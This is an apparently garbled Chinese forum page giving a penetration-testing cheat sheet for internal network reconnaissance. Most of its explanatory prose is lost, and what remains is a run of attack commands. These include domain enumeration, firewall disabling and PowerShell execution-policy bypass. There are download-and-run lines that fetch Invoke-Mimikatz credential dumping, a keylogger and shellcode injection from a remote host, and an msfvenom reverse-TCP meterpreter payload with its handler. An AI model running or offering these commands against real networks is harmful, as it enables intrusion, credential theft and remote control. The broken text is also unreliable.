[21749] 2021-03-08_内网渗透之信息收集

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2021-03-08_内网渗透之信息收集 L e m o n S e c   2 0 2 1 - 0 3 - 0 8 D M Z w e b d n s p a y l o a d 线 D N S 5 3 D N S w e b D H C P w e b P C I P 1 . s . e x e 1 9 2 . 1 6 8 . 1 . 1 0 1 9 2 . 1 6 8 . 2 . 0 / 3 . 0 w i n d o w s : 4 4 5 / l i n u x : 2 2 2 . 使 m e t e r p r e t e r 3 . 4 . / F T P 访 m s t s c s s h f t p m s t s c
访 x s h e l l # I P i p c o n f i g   / a l l # s y s t e m i n f o   |   f i n d s t r   / B   / C : " O S   N a m e "   / C : " O S   V e r s i o n "   #   s y s t e m i n f o   |   f i n d s t r   / B   / C : " O S   "   / C : " O S   "   # #   e c h o   % P R O C E S S O R _ A R C H I T E C T U R E %   # P o w e r S h e l l p o w e r s h e l l   " G e t - W m i O b j e c t   - c l a s s   W i n 3 2 _ P r o d u c t   | S e l e c t - O b j e c t   - P r o p e r t y   n a m e ,   v e r s i o n "   # w h o a m i   & &   w h o a m i   / p r i v # w m i c   s e r v i c e   l i s t   b r i e f # w m i c   p r o d u c t   g e t   n a m e ,   v e r s i o n   # w m i c   p r o c e s s   l i s t   b r i e f
w m i c   p r o c e s s   l i s t   b r i e f # w m i c   s t a r t u p   g e t   c o m m a n d , c a p t i o n   # a t w i n 1 0 s c h t a s k s   / q u e r y   / f o   L I S T   / v w i n 1 0 # n e t   s t a t i s t i c s   w o r k s t a t i o n # n e t   u s e r   # n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   # # 线 q u e r y   u s e r   | |   q w i n s t a   # n e t   s e s s i o n # n e t s t a t   - a n o / - t n l p # s y s t e m i n f o   #   I D w m i c   q f e   g e t   C a p t i o n , D e s c r i p t i o n , H o t F i x I D , I n s t a l l e d O n # 访 n e t   s h a r e   4 4 5 # w m i c   s h a r e   g e t   n a m e , p a t h , s t a t u s   # n e t   u s e   k : 1 9 2 . 1 6 8 . 1 . 1 0 c $ # w m i c   O S   g e t   C a p t i o n , C S D V e r s i o n , O S A r c h i t e c t u r e , V e r s i o n # r o u t e   p r i n t # A R P a r p   - a m a c a r p m a c a r p a r p   - a # ( W i n d o w s   S e r v e r   2 0 0 3   ) n e t s h   f i r e w a l l   s e t   o p m o d e   d i s a b l e   # ( W i n d o w s   S e r v e r   2 0 0 3   ) n e t s h   a d v f i r e w a l l   s e t   a l l p r o f i l e s   s t a t e   o f f   # ( n e t s h ) n e t s h   f i r e w a l l   s h o w   c o n f i g # t a s k l i s t # 线 q u s e r # c m d k e y   / l # W M I C   / N o d e : l o c a l h o s t   / N a m e s p a c e : r o o t S e c u r i t y C e n t e r 2   P a t h   A n t i V i r u s P r o d u c t   G e t   d i s p l a y N a m e   / F o r m a t : L i s t #
使 W M I C ( W i n d o w s ) H T M L h t t p : / / w w w . f u z z y s e c u r i t y . c o m / s c r i p t s / f i l e s / w m i c _ i n f o . r a r i p c o n f i g   / a l l   I P D N S I P D N S n s l o o k u p I P I P D N S # n e t   a c c o u n t s   # h o s t s l i n u x : c a t     / e t c / h o s t s w i n d o w s : t y p e     c : W i n d o w s s y s t e m 3 2 d r i v e r s e t c h o s t s # d n s i p c o n f i g     / d i s p l a y d n s # w h o a m i   # S I D w h o a m i   / a l l   # n e t   u s e r   x x x   / d o m a i n   # n e t   u s e r   / d o m a i n   # " ( ) " " ( ) " s y s t e m i n f o   # " D N S ( ) " " ( ) " n e t   c o n f i g   w o r k s t a t i o n   # n e t   t i m e   / d o m a i n # n e t   a c c o u n t s   / d o m a i n   #         n e t   c o n f i g   w o r k s t a t i o n # n e t   u s e r   / d o m a i n #   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   / d o m a i n # i p p i n g   - a   x x x . c o m # n e t   v i e w   / d o m a i n #   n e t   v i e w   / d o m a i n : H A C H E   # e n t e r p r i s e   a d m i n s n e t   g r o u p   / d o m a i n   # n e t   g r o u p   " d o m a i n   a d m i n s "   / d o m a i n #
1 . 2 . 3 . D N S ( D o m a i n   N a m e   S e r v e r ) I P D N S D C ( D N S D C ) 4 . ( A c t i v e   D i r e c t o r y ) 5 . D N S d n s 1 . n b t s c a n 使 n b t s c a n T C P / I P N e t B I O S 使 I P 2 . 使 I C M P 3 . a r p - s c a n 使 n e t   g r o u p   " E n t e r p r i s e   a d m i n s "   / d o m a i n   # n e t   g r o u p   " d o m a i n   c o n t r o l l e r s "   / d o m a i n # n l t e s t   / D C L I S T : h a c k e   # d n s i p c o n f i g     / d i s p l a y d n s # c ( ) d i r   W I N - 7 5 N A 0 9 4 9 G F B . s a f e - d u c k . c o m c $ # n e t   g r o u p   " d o m a i n   c o m p u t e r s "   / d o m a i n   # n l t e s t   / d o m a i n _ t r u s t s   # w m i c   u s e r a c c o u n t   g e t   / a l l   # d s q u e r y   u s e r   # d s q u e r y   c o m p u t e r # C M D i p f o r   / L   % P   i n   ( 1 , 1 , 2 5 4 )   D O   @ p i n g   w   1   n   1   1 9 2 . 1 6 8 . 1 . % P   |   f i n d s t r   " T T L   = " # n e t   g r o u p   " d o m a i n c o n t r o l l e r s "   / d o m a i n n b t s c a n . e x e   1 9 2 . 1 6 8 . 1 . 1 / 2 0
4 . E m p i r e a r p s c a n 5 . N i s h a n g I n v o k e - A R P S c a n . p s 1 6 . s . e x e b a n n e r 1 . s . e x e 2 . t e l n e t 3 . M e t a t s p l o i t " s e a r c h   p o r t s c a n " 4 . P o w e r S p l o i t I n v o k e - A R P S c a n . p s 1 5 . N i s h a n g I n v o k e - P o r t S c a n M S F M S F s h e l l D O S r u n   w i n e n u m a r p - s c a n   - - i n t e r f a c e = e t h 0   - - l o c a l n e t s . e x e   t c p   1 9 2 . 1 6 8 . 1 . 1   1 9 2 . 1 6 8 . 1 . 2 5 4   2 1 , 8 0 , 3 3 8 9 , 4 4 5   1 0 r u n   w i n e n u m
p o w e r s h e l l   p o w e r s h e l l 使 1 . P o w e r S p l o i t         P o w e r S p l o i t P o w e r S h e l l k a l i p o w e r s p l o i t g e t - e x e c u t i o n p o l i c y s e t - e x e c u t i o n p o l i c y   u n r e s t r i c t e d # e x e c   b y p a s s # p o w e r s h e l l . e x e   - E x e c u t i o n p o l i c y   B Y p a s s   - f i l e   1 2 3 . p s 1       # p o w e r s h e l l . e x e   - E x e c u t i o n p o l i c y   B Y p a s s     - w i n d o w s t y l e   h i d d e n   - n o l o g o   - n o n l n t e r a c t i v e   - n o p r o f i l e   - f i l e   1 2 3 . p s 1     # c m d 使 p o w e r s h e l l p o w e r s h e l l   - e x e c   b y p a s s   " i m p o r t - m o d u l e   c : p o w e r s h e l l . p s 1 ; G e t - N e t U s e r "
h t t p s : / / g i t h u b . c o m / P o w e r S h e l l M a f i a / P o w e r S p l o i t m e t e r p r e t e r p o w e r s p l o i t p o w e r s p l o i t v p s 访 # l o a d   p o w e r s h e l l # p s p o w e r s h e l l _ i m p o r t   / u s r / s h a r e / w i n d o w s - r e s o u r c e s / p o w e r s p l o i t / R e c o n / x x . p s 1 # p o w e r s h e l l _ e x e c u t e     G e t - N e t D o m a i n   # G e t - N e t D o m a i n     # G e t - N e t u s e r   # G e t - N e t D o m a i n C o n t r o l l e r   # G e t - N e t C o m p u t e r     # G e t - N e t s h a r e #     G e t - N e t R D P S E S S I O N     # G e t - N e t P r o c e s s     #   G e t - A D O P J E C T   # i n v o k e - p r o c e s s h u n t e r
i e x ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 1 . 4 / P o w e r S p l o i t / R e c o n / I n v o k e - P o r t s c a n . p s 1 " ) # i n v o k e - p o r t s c a n   - h o s t s   1 9 2 . 1 6 8 . 1 . 1 / 2 4   - p o r t s   " 2 1 , 2 2 , 8 0 , 1 3 9 , 8 0 , 4 4 5 " # i n v o k e - m i m i k a t z h a s h i e x ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 1 . 4 / P o w e r S p l o i t / E x f i l t r a t i o n / I n v o k e - M i m i k a t z . p s 1 " ) # h a s h I n v o k e - M i m i k a t z   - d u m p c r e d s
p o w e r s p l o i t ~ m s f p o w e r s h e l l W e b 使 # g e t - k e y s t r o k e s i e x ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 1 . 4 / P o w e r S p l o i t / E x f i l t r a t i o n / G e t - K e y s t r o k e s . p s 1 " ) # 1 2 3 . t x t G e t - K e y s t r o k e s   - l o g p a t h   C : U s e r s a d m i n 1 2 3 . t x t # p o w e r s h e l l   p a y l o a d m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   L H O S T = 1 9 2 . 1 6 8 . 1 . 5   L P O R T = 1 1 2 3   - f   p o w e r s h e l l   - o   / r o o t / x d x . p s 1 # u s e   e x p l o i t / m u l t i / h a n d l e r s e t   l p o r t   1 1 2 3 r u n # p s i e x ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 3 . 1 / x d x . p s 1 " )     x d x . p s 1   i e x ( n e w - o b j e c t   n e t . w e b c l i e n t ) . d o w n l o a d s t r i n g ( " h t t p : / / 1 9 2 . 1 6 8 . 3 . 1 / P o w e r S p l o i t / C o d e E x e c u t i o n / I n v o k e - S h e l l c o d e . p s 1 " )   # m s f p a y l o a d i n v o k e - s h e l l c o d e . p s 1       # m s f I n v o k e - S h e l l c o d e     - s h e l l c o d e     $ b u f     - F o r c e     f i n d s t r     / s   / m   " p a s s w o r d "   * . *
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则